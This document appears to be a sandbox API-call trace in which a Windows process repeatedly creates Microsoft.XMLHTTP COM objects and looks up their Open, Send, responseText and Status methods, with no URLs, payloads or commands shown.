	[0959.581] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0959.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0959.581] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0959.582] SysStringLen (param_1=0x0) returned 0x0
	[0959.582] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0959.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0959.582] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0959.582] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0959.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0959.582] ??2@YAPEAX_K@Z () returned 0x62f310
	[0959.582] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0959.582] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0959.582] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0959.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0959.582] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0959.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0959.582] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0959.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0959.582] longjmp () 
	[0959.583] longjmp () 
	[0959.583] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0959.583] SysStringLen (param_1=0x0) returned 0x0
	[0959.583] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0959.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0959.583] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0959.583] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0959.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0959.583] ??2@YAPEAX_K@Z () returned 0x62f330
	[0959.583] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0959.583] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0959.583] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0959.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0959.583] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0959.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0959.583] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0959.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0959.584] longjmp () 
	[0959.584] longjmp () 
	[0959.584] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0959.584] SysStringLen (param_1=0x0) returned 0x0
	[0959.584] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0959.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0959.584] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0959.584] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0959.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0959.584] ??2@YAPEAX_K@Z () returned 0x62f310
	[0959.584] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0959.584] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0959.584] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0959.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0959.584] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0959.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0959.584] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0959.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0959.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0959.585] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0959.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0961.496] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0961.497] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0961.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0961.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0961.497] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0961.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0968.654] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0968.654] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0968.654] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0968.656] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0968.656] SysStringLen (param_1=0x0) returned 0x0
	[0968.656] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0968.656] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0968.656] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0968.656] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0968.656] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0968.656] ??2@YAPEAX_K@Z () returned 0x62f310
	[0968.656] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0968.656] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0968.656] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0968.656] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0968.657] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0968.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.657] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0968.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0968.660] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0968.660] SysStringLen (param_1=0x0) returned 0x0
	[0968.660] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0968.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0968.660] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7340) returned 0x0
	[0968.660] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0968.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0968.660] ??2@YAPEAX_K@Z () returned 0x62f330
	[0968.660] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f330) 
	[0968.660] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0968.660] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0968.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7340) returned 0x0
	[0968.660] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7340) returned 0x3
	[0968.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.661] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7340, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0968.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
